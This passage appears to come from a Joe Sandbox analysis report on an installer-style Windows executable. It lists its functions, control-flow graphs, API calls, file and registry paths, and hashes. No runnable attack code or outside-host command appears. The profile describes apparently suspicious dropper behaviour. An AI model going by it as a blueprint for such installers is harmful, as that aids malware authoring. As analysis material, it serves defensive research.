                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                                          • String ID: 9
                                                          • API String ID: 163830602-2366072709
                                                          • Opcode ID: 0f6749e0356039c80119e9da3c7509a60750b74a106ccf27ce207c31930fcb0b
                                                          • Instruction ID: 4c47c5b6e7001fd487639b42c981b506dedcea616f9f6d447a3608767ea6fa5a
                                                          • Opcode Fuzzy Hash: 0f6749e0356039c80119e9da3c7509a60750b74a106ccf27ce207c31930fcb0b
                                                          • Instruction Fuzzy Hash: 8351E575D1021AABDF20DFA5DA88AAEB779FF04304F50443BE511B72D0D7B899828B58
                                                          Function 004065EC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 809 4065ec-40660c GetSystemDirectoryW 810 406610-406612 809->810 811 40660e 809->811 812 406623-406625 810->812 813 406614-40661d 810->813 811->810 815 406626-406659 wsprintfW LoadLibraryExW 812->815 813->812 814 40661f-406621 813->814 814->815
                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406603
                                                          • wsprintfW.USER32 ref: 0040663E
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406652
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                          • String ID: %s%S.dll$UXTHEME$\
                                                          • API String ID: 2200240437-1946221925
                                                          • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                          • Instruction ID: 71749ee66451d02820e1787a81c679d49f65c12e6a5790e59d0bd58148e6f3af
                                                          • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                          • Instruction Fuzzy Hash: 64F021705001196BCF10AB64DD0DFAB3B5CA700304F10487AA546F11D1EBBDDA65CB98
                                                          Function 004057B5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 816 4057b5-405800 CreateDirectoryW 817 405802-405804 816->817 818 405806-405813 GetLastError 816->818 819 40582d-40582f 817->819 818->819 820 405815-405829 SetFileSecurityW 818->820 820->817 821 40582b GetLastError 820->821 821->819
                                                          APIs
                                                          • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057F8
                                                          • GetLastError.KERNEL32 ref: 0040580C
                                                          • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405821
                                                          • GetLastError.KERNEL32 ref: 0040582B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                          • String ID: C:\Users\user\Desktop
                                                          • API String ID: 3449924974-224404859
                                                          • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                          • Instruction ID: 81d47e77b106c5c69b6f53bab6ade4ced08fad65239eb4e1eedbceb886e7a33c
                                                          • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                          • Instruction Fuzzy Hash: 8C01E5B2C00619DADF009FA1D9487EFBFB8EB14354F00803AD945B6281E7789618CFA9
                                                          Function 00405DA3 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 822 405da3-405daf 823 405db0-405de4 GetTickCount GetTempFileNameW 822->823 824 405df3-405df5 823->824 825 405de6-405de8 823->825 827 405ded-405df0 824->827 825->823 826 405dea 825->826 826->827
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00405DC1
                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\450707124374000811.exe",00403371,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF), ref: 00405DDC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: "C:\Users\user\Desktop\450707124374000811.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                          • API String ID: 1716503409-1233918687
                                                          • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                          • Instruction ID: 0c0ec814c80ab85915f41b1413265c2d813ce01cabb3ac5407dd3af97de42ecd
                                                          • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                          • Instruction Fuzzy Hash: 99F03076600304FFEB009F69DD09E9BB7A9EF95710F11803BE900E7250E6B199549B64
                                                          Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 828 10001759-10001795 call 10001b18 832 100018a6-100018a8 828->832 833 1000179b-1000179f 828->833 834 100017a1-100017a7 call 10002286 833->834 835 100017a8-100017b5 call 100022d0 833->835 834->835 840 100017e5-100017ec 835->840 841 100017b7-100017bc 835->841 842 1000180c-10001810 840->842 843 100017ee-1000180a call 100024a4 call 100015b4 call 10001272 GlobalFree 840->843 844 100017d7-100017da 841->844 845 100017be-100017bf 841->845 849 10001812-1000184c call 100015b4 call 100024a4 842->849 850 1000184e-10001854 call 100024a4 842->850 865 10001855-10001859 843->865 844->840 851 100017dc-100017dd call 10002b57 844->851 847 100017c1-100017c2 845->847 848 100017c7-100017c8 call 1000289c 845->848 853 100017c4-100017c5 847->853 854 100017cf-100017d5 call 10002640 847->854 861 100017cd 848->861 849->865 850->865 864 100017e2 851->864 853->840 853->848 869 100017e4 854->869 861->864 864->869 870 10001896-1000189d 865->870 871 1000185b-10001869 call 10002467 865->871 869->840 870->832 876 1000189f-100018a0 GlobalFree 870->876 878 10001881-10001888 871->878 879 1000186b-1000186e 871->879 876->832 878->870 881 1000188a-10001895 call 1000153d 878->881 879->878 880 10001870-10001878 879->880 880->878 882 1000187a-1000187b FreeLibrary 880->882 881->870 882->878
                                                          APIs
                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                          • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                          • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                          • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                            • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,8BC3C95B), ref: 100022B8
                                                            • Part of subcall function 10002640: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B2
                                                            • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2482263763.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.2482210897.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.2482282589.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.2482380281.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc$Librarylstrcpy
                                                          • String ID:
                                                          • API String ID: 1791698881-3916222277
                                                          • Opcode ID: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                          • Instruction ID: 65685ba44f5e0dd4e22f20931bb662b0f8110762eb821eef9687284fed8b6370
                                                          • Opcode Fuzzy Hash: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                          • Instruction Fuzzy Hash: 4A31AC75804241AAFB14DF649CC9BDA37E8FF043D4F158065FA0AAA08FDFB4A984C761
                                                          Function 0040202C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 885 40202c-402038 886 4020f7-4020f9 885->886 887 40203e-402054 call 402c37 * 2 885->887 888 402245-40224a call 401423 886->888 897 402064-402073 LoadLibraryExW 887->897 898 402056-402062 GetModuleHandleW 887->898 895 402885-40288c 888->895 896 402abf-402ace 888->896 895->896 900 402075-402084 call 4066cb 897->900 901 4020f0-4020f2 897->901 898->897 898->900 905 402086-40208c 900->905 906 4020bf-4020c4 call 4052e6 900->906 901->888 908 4020a5-4020b8 call 10001759 905->908 909 40208e-40209a call 401423 905->909 910 4020c9-4020cc 906->910 914 4020ba-4020bd 908->914 909->910 919 40209c-4020a3 909->919 910->896 912 4020d2-4020dc call 403930 910->912 912->896 918 4020e2-4020eb FreeLibrary 912->918 914->910 918->896 919->910
                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402057
                                                            • Part of subcall function 004052E6: lstrlenW.KERNEL32(0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                            • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                            • Part of subcall function 004052E6: lstrcatW.KERNEL32(0042C228,0040325E,0040325E,0042C228,00000000,0041D800,74DF23A0), ref: 00405341
                                                            • Part of subcall function 004052E6: SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
                                                            • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                            • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                            • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402068
                                                          • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020E5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                          • String ID: pv\
                                                          • API String ID: 334405425-2953343725
                                                          • Opcode ID: 864119935e3c92a972c97e6683a8f1d17c59749ba81c3d86f0a55431c134cf0a
                                                          • Instruction ID: 42f79ed1eba5b951ee52ea84f7896f3e8cd2b7b6c2435203e6ffc1da5cb37fd9
                                                          • Opcode Fuzzy Hash: 864119935e3c92a972c97e6683a8f1d17c59749ba81c3d86f0a55431c134cf0a
                                                          • Instruction Fuzzy Hash: EF21C271900208EACF20AFA5CE4DAAE7A70AF04358F64413BF611B51E0DBBD8941DA5E
                                                          Function 004023DE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsqA869.tmp,00000023,00000011,00000002), ref: 00402429
                                                          • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsqA869.tmp,00000000,00000011,00000002), ref: 00402469
                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsqA869.tmp,00000000,00000011,00000002), ref: 00402551
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: CloseValuelstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsqA869.tmp
                                                          • API String ID: 2655323295-3207034729
                                                          • Opcode ID: b9a55d7f8e3e2dfd25d95f10a550debddd0b738e27ba6f811f629087d2df6e98
                                                          • Instruction ID: 6bb9d856f7880fc58a9027dca602f60b1bf716c37025aa19f03bdcb786be9778
                                                          • Opcode Fuzzy Hash: b9a55d7f8e3e2dfd25d95f10a550debddd0b738e27ba6f811f629087d2df6e98
                                                          • Instruction Fuzzy Hash: 33118171E00108AEEB10AFA5DE49EAEBAB8EB54354F11843AF504F71D1DBB84D419B58
                                                          Function 00401B71 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 72memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GlobalFree.KERNEL32(005C7670), ref: 00401BE1
                                                          • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocFree
                                                          • String ID: Call$pv\
                                                          • API String ID: 3394109436-2887556045
                                                          • Opcode ID: 84467de0dce396edb77585f845136cbcf2c5fb7762c5f8c3cd98e46705f302be
                                                          • Instruction ID: 92ace51ac37ea5806125e07fe733601b5cdc010b72bea360b2f02f73c4ad7c89
                                                          • Opcode Fuzzy Hash: 84467de0dce396edb77585f845136cbcf2c5fb7762c5f8c3cd98e46705f302be
                                                          • Instruction Fuzzy Hash: 4921C072A01100DFDB20EB94CE8495A76A9AF44318725013BF902F72D1DA78A9519B5D
                                                          Function 00402D2A Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402D98
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402DB9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Close$Enum
                                                          • String ID:
                                                          • API String ID: 464197530-0
                                                          • Opcode ID: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                          • Instruction ID: 79d7ed05643b621c8e133add132d673d265f3a1e436d48668917152172a1be90
                                                          • Opcode Fuzzy Hash: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                          • Instruction Fuzzy Hash: AD116A32540509FBDF129F90CE09BEE7B69EF58340F110036B905B50E0E7B5DE21AB68
                                                          Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00405BFE: CharNextW.USER32(?,?,0042FA50,?,00405C72,0042FA50,0042FA50,?,?,74DF3420,004059B0,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405C0C
                                                            • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C11
                                                            • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C29
                                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                            • Part of subcall function 004057B5: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057F8
                                                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\pechay\transskribere\jon,?,00000000,000000F0), ref: 0040164D
                                                          Strings
                                                          • C:\Users\user\AppData\Roaming\pechay\transskribere\jon, xrefs: 00401640
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                          • String ID: C:\Users\user\AppData\Roaming\pechay\transskribere\jon
                                                          • API String ID: 1892508949-410581097
                                                          • Opcode ID: 64933fb819e76c9c5a4bf4a349c51baae94111e9253f76940e8e3ccf7a91a371
                                                          • Instruction ID: f4fc84295b44ed4b17ac4e1ae603b231d2bd930c419d474b78473434f223dd35
                                                          • Opcode Fuzzy Hash: 64933fb819e76c9c5a4bf4a349c51baae94111e9253f76940e8e3ccf7a91a371
                                                          • Instruction Fuzzy Hash: 7711BE31504104ABCF316FA4CD01AAF36A0EF14368B28493BEA45B22F1DB3E4E519A4E
                                                          Function 0040525A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 00405289
                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 004052DA
                                                            • Part of subcall function 00404263: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404275
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID:
                                                          • API String ID: 3748168415-3916222277
                                                          • Opcode ID: 3fd7a5bdf8e2bcd8409f4f3104da706e70a9a66b0760f7062862c6eded0751b7
                                                          • Instruction ID: e35359e86d41fb5d6968ee62a371e6abd11f03428b82ac61abb391d392e116c6
                                                          • Opcode Fuzzy Hash: 3fd7a5bdf8e2bcd8409f4f3104da706e70a9a66b0760f7062862c6eded0751b7
                                                          • Instruction Fuzzy Hash: 0E017131510609ABDF209F51DD84A5B3A25EF84754F5000BBFA04751D1C77A9C929E6E
                                                          Function 00406150 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,0042C228,00000000,?,?,Call,?,?,004063C4,80000002), ref: 00406196
                                                          • RegCloseKey.ADVAPI32(?,?,004063C4,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,0042C228), ref: 004061A1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
